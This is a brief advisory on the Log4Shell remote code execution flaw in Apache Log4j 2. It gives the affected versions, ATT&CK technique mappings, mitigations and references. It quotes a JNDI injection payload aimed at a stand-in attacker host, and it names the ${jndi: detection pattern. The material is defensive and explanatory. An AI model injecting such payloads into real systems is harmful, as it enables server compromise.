Log4Shell (CVE-2021-44228) is a critical remote code execution (RCE) vulnerability in Apache Log4j 2, a widely used Java logging library. Discovered in December 2021, it allows unauthenticated attackers to execute arbitrary code on vulnerable servers by abusing JNDI lookups via user-controlled input.

Log4j versions 2.0 to 2.14.1 allowed lookups using the Java Naming and Directory Interface (JNDI). Attackers could inject payloads like ${jndi:ldap://attacker.com/a} into log messages. These messages, when logged, would cause the vulnerable server to fetch and execute remote Java classes from the attacker's server, leading to full compromise.

• T1190 – Exploit Public-Facing Application
• T1059.005 – Command and Scripting Interpreter: Visual Basic
• T1105 – Ingress Tool Transfer
• T1210 – Exploitation of Remote Services
• T1133 – External Remote Services

View this mapping using official MITRE ATT&CK Navigator

• Update Log4j to version 2.17.1 or later
• Set log4j2.formatMsgNoLookups=true as a JVM option for legacy apps
• Use WAF rules to block JNDI patterns in headers and URIs
• Monitor logs for suspicious patterns like ${jndi:
• Isolate exposed Java apps and scan for evidence of exploitation

• Apache Log4j Security Page
• NVD CVE-2021-44228
• MITRE ATT&CK Framework
• CISA Guidance